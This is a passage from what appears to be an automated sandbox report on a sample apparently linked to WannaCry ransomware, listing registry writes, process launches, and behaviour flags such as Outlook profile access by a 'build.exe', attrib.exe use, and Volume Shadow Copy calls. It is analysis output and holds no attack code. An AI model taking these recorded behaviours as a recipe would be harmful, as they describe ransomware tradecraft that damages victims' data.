00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133579925885708296" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070400420061007200510065007600690072000a0041006200670020006600760074006100720071002000760061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000002d21616d3c92da0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1474490143-3221292397-4168103503-1000\{7B58869D-9BAE-424A-83C2-5D7D6B15CFD1} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\svchost.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffffb99cc40,0x7ffffb99cc4c,0x7ffffb99cc58
